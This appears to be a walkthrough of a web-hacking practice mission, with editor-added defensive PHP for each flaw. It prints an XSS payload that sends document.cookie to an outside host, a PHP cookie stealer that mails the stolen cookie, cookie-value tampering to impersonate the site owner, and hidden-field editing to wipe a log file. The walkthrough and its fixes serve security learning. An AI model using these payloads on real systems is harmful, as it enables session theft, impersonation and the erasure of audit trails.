XSS (Cross-Site Scripting) and HTTP Header Tampering

Click on "Private Message" in the menu and fill in the form as follows, using the following XSS payload as the body:

javascript:void(window.location='http://www.niser11.in/cookie.php?'+document.cookie);

Give it the subject "cookie.php" and send the message to "m-crap (owner)". For this to work, cookie.php needs to receive the cookie and forward it to you. Here is the PHP code:

<?php
// Receives the cookie string that the payload above appends to the URL and mails it.
// The payload puts document.cookie directly after "?", so there is no named "cookie"
// parameter: the raw query string is what arrives.
$cookie = $_SERVER['QUERY_STRING'] ?? '';
mail("admin@niser11.in", "Cookie stealer report", $cookie);
?>

This code will send m-crap's cookie information to your e-mail address. Note that the mission does not require this PHP page, but it is useful for understanding the complete process.
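From the defending side, the payload above only works because the message body is rendered in a way that lets a javascript: URL become something the recipient can open, and because the session data is readable from document.cookie. The following PHP is an added example written for this page, not code from the walkthrough or from the target site: it entity-encodes a message body, turns only vetted http(s) URLs into links, and marks the session cookie HttpOnly so an injected script cannot read it. The function names and the check at the bottom are the editor's own.

```php
<?php
declare(strict_types=1);

// Added example (not from the walkthrough or the target site): render a private
// message so that a "javascript:" URL in it can never run, and keep the session
// cookie out of document.cookie.

/** Accept a URL only if it is absolute http(s); javascript:, data: and the like are refused. */
function safe_link_url(string $url): ?string
{
    $url = trim($url);
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    $scheme = strtolower($parts['scheme']);
    return ($scheme === 'http' || $scheme === 'https') ? $url : null;
}

/** Entity-encode the whole body, then turn only vetted http(s) URLs into anchors. */
function render_message_body(string $body): string
{
    $out = '';
    // Split into plain-text runs and URL candidates; odd indices are the candidates.
    $parts = preg_split('~(https?://[^\s<>"\']+)~i', $body, -1, PREG_SPLIT_DELIM_CAPTURE);
    foreach ($parts as $i => $part) {
        $esc = htmlspecialchars($part, ENT_QUOTES | ENT_HTML5, 'UTF-8');
        if ($i % 2 === 1 && safe_link_url($part) !== null) {
            $out .= '<a href="' . $esc . '" rel="noopener noreferrer">' . $esc . '</a>';
        } else {
            $out .= $esc;   // "javascript:..." stays inert, escaped text
        }
    }
    return $out;
}

// Session cookie flags: HttpOnly keeps the session id out of document.cookie, so even
// an injected script cannot read it; Secure and SameSite limit where it is sent.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Lax',
]);

// Constructed check using the walkthrough's payload as the message body.
$payload = "javascript:void(window.location='http://www.niser11.in/cookie.php?'+document.cookie);";
var_dump(safe_link_url($payload));          // NULL: the scheme is javascript, not http(s)
echo render_message_body($payload), "\n";   // no href="javascript:..." anywhere in the output
assert(strpos(render_message_body($payload), 'href="javascript') === false);
```

Escaping first and linkifying only what the allowlist accepts is the order that matters: the walkthrough's payload contains an embedded http URL, which becomes a plain link carrying no cookie, while the javascript: prefix is rendered as text. With HttpOnly set, a script that does run still cannot read the session cookie.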

In the message you should receive the following. To simplify the attack, the site directly provides us with the stolen information:

  • strUsername=m-crap@crappysoft.com
  • strPassword=94a35a3b7befff5eb2a8415af04aa16c
  • intID=1

Use Firecookie in Firefox or Inspect Element in Google Chrome to change the values as follows:

[Figure 1: screenshot of the edited cookie values]

When you paste the username value, take care to turn the URL-encoded "%40" back into "@".

Click on "Pay salaries" and then on the "Pay" button. You're done with this stage.
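The cookie edit works because the application treats strUsername, strPassword and intID in the cookie as the truth about who is logged in, so whoever can edit the cookie can be anyone. The PHP below is an added example for this page, not code from the walkthrough or the target site: it contrasts that pattern with a cookie that carries only an HMAC-signed user id, where edited fields fail verification. COOKIE_SECRET, the user ids and the timestamps are constructed values.

```php
<?php
declare(strict_types=1);

// Added example (not from the walkthrough or the target site): why a cookie that
// carries strUsername/strPassword/intID can be edited into someone else's identity,
// and a signed-token alternative. The secret and user ids below are constructed.

const COOKIE_SECRET = 'constructed-server-side-secret-replace-with-random-bytes';

// Vulnerable pattern implied by the walkthrough: the server believes the cookie.
// Changing intID in the browser is enough to become user 1.
function current_user_vulnerable(array $cookie): ?int
{
    if (!isset($cookie['strUsername'], $cookie['strPassword'], $cookie['intID'])) {
        return null;
    }
    return (int) $cookie['intID'];
}

// Hardened: the cookie holds "<userId>.<expiry>.<hmac>". The HMAC uses a secret the
// browser never sees, so any edited field makes verification fail.
function issue_token(int $userId, int $expiresAt): string
{
    $payload = $userId . '.' . $expiresAt;
    return $payload . '.' . hash_hmac('sha256', $payload, COOKIE_SECRET);
}

function verify_token(string $token, int $now): ?int
{
    $parts = explode('.', $token);
    if (count($parts) !== 3) {
        return null;
    }
    [$userId, $expiresAt, $mac] = $parts;
    if (!ctype_digit($userId) || !ctype_digit($expiresAt)) {
        return null;
    }
    $expected = hash_hmac('sha256', $userId . '.' . $expiresAt, COOKIE_SECRET);
    if (!hash_equals($expected, $mac)) {   // constant-time comparison
        return null;
    }
    if ((int) $expiresAt < $now) {
        return null;                        // expired tokens are rejected too
    }
    return (int) $userId;
}

// Constructed check: user 7 is issued a token, then the id field is edited to 1.
$now      = 1700000000;
$token    = issue_token(7, $now + 3600);
$tampered = preg_replace('/^7\./', '1.', $token, 1);
var_dump(verify_token($token, $now));      // int(7): the genuine token verifies
var_dump(verify_token($tampered, $now));   // NULL: the HMAC no longer matches
var_dump(current_user_vulnerable(['strUsername' => 'x', 'strPassword' => 'y', 'intID' => '1']));  // int(1): trusted blindly
```

A server-side session store with a random session id achieves the same thing with even less in the cookie. Either way, the password hash that the walkthrough reads from strPassword should never be sent to the browser at all; it is only useful to an attacker.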

Cover your tracks

The mission is not over yet: r-conner thanks you but tells you to remove the traces of your activity using the "subscribe to mailing list" page. Click on the "Mailing list" link and view the page source. Notice that there is a hidden field named strFilename with the value ./files/mailinglist/addresses.txt. If you look at this file, you will get the list of e-mail addresses:

[Figure 2: contents of addresses.txt]

In addition, the mailing list form says that it deletes all entries that do not contain "@", which is perfect for clearing the log file. Also notice that directory listing is enabled on the files/ directory, so we can find our log file:

[Figure 3: directory listing of files/]

Just replace the value in the hidden field

<input type='hidden' name='strFilename' value='./files/mailinglist/addresses.txt'>

with this:

<input type='hidden' name='strFilename' value='./files/logs/logs.txt'>

This will put the e-mail address you just typed into the logs.txt file instead of the mailing list. Submit the form and you're done!
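The hidden strFilename field is the whole problem here: the client chooses which file the form appends to, so the log file is just one more path. The PHP below is an added example for this page, not the site's code. It shows the vulnerable shape the field implies next to a version that keeps every path on the server and lets the client send only a key from an allowlist. The list key, the temp-directory path and the sample addresses are constructed.

```php
<?php
declare(strict_types=1);

// Added example (not the site's code): the hidden strFilename field lets the client
// choose which file the form appends to. The fix is to keep the path on the server
// and let the client pick only a key from an allowlist. Paths below are constructed.

/** Server-side map of list keys to files; the browser never sees a path. */
function mailing_lists(): array
{
    return ['customers' => sys_get_temp_dir() . '/addresses.txt'];
}

// Vulnerable shape implied by the walkthrough (shown, not called): the client names the file.
function subscribe_vulnerable(array $post): void
{
    file_put_contents($post['strFilename'], $post['strEmail'] . "\n", FILE_APPEND);
}

/** Hardened: resolve the key, validate the address, append only to the mapped file. */
function subscribe_hardened(array $post): ?string
{
    $file = mailing_lists()[(string) ($post['list'] ?? '')] ?? null;
    $addr = (string) ($post['strEmail'] ?? '');
    if ($file === null || filter_var($addr, FILTER_VALIDATE_EMAIL) === false) {
        return null;   // unknown list or malformed address: nothing is written
    }
    file_put_contents($file, $addr . "\n", FILE_APPEND | LOCK_EX);
    return $file;
}

// Constructed checks.
var_dump(subscribe_hardened(['list' => 'customers', 'strEmail' => 'user@example.com']));            // string: the temp addresses.txt
var_dump(subscribe_hardened(['list' => './files/logs/logs.txt', 'strEmail' => 'user@example.com'])); // NULL: not a known key
var_dump(subscribe_hardened(['strFilename' => './files/logs/logs.txt', 'strEmail' => 'user@example.com'])); // NULL: the field is ignored
```

Two further points follow from the walkthrough: log files should be written only by the application's own logging code, never by a form handler, and the directory listing it relies on to find logs.txt would be switched off in the web server configuration (for Apache, `Options -Indexes` on the files/ directory).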

About the Author

Aloha, I'm Amit Ghosh, a web entrepreneur and avid blogger. Bitten by the entrepreneurial bug, I got kicked out of college and ended up being a millionaire running a digital media company named Aeron7, headquartered in Lithuania.
